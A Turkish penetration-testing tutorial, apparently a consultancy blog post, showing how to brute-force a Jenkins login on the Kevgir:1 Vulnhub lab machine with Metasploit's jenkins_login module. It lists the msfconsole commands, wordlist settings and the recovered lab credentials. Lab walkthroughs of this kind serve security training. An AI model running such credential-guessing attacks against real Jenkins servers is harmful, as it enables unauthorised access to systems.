MSF jenkins_login Modülü ile Jenkins Uygulamasına Erişim Sağlanabilecek Hesaplara Ait Kimlik Bilgilerinin Tespit Edilmesi

Yazarı:
Ertuğrul BAŞARANOĞLU
-
0
290
views
Sızma testleri sırasında, hedef olarak belirlenen Jenkins uygulamasına erişim sağlayabilecek kullanıcı hesaplarının kimlik bilgilerinin tespit edilmesi gerekmektedir. Bu yazıda, Kevgir:1 sanal makinesinde MSF jenkins_login auxiliary modülü kullanılarak, kaba kuvvet (sözlük) saldırısı ile Jenkins yazılımına erişim sağlayabilecek hesaba ait kimlik bilgileri elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

 

Yazıda kullanılan Kevgir:1 sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/kevgir-1,137/

 

Jenkins uygulamasının 192.168.30.139 IP adresinin TCP 9000. portundan hizmet veriyor olsun. Bu uygulamaya kaba kuvvet saldırı için kullanılabilecek hesapların adları ve parolaları; /root/Desktop/ dizini altına kaydedilmiş olan kimlik bilgileri ile tespit edilecektir.

Bu amaçla kullanılacak modül seçilir ve seçenekleri incelenir.

search jenkins
use auxiliary/scanner/http/jenkins_login
show options

 

Seçenekler ayarlanır.

set RHOSTS 192.168.30.139
set RPORT 9000
set USER_FILE /root/Desktop/Kullanicilar
set PASS_FILE /root/Desktop/Parolalar
set VERBOSE false
show options

 

Modül çalıştırılır ve kaba kuvvet saldırısı gerçekleştirilir.

run

 

Tarama sonucundan da görüldüğü gibi, uygulamaya “admin” ve “Admin” kullancı adları ve “hello” parolası ile giriş yapılabilir.

 

Böylece oturum açılmıştır.

 

 

İlişkili Yazılar:
Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Benzer YazılarYAZARIN DİĞER İÇERİKLERİ

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.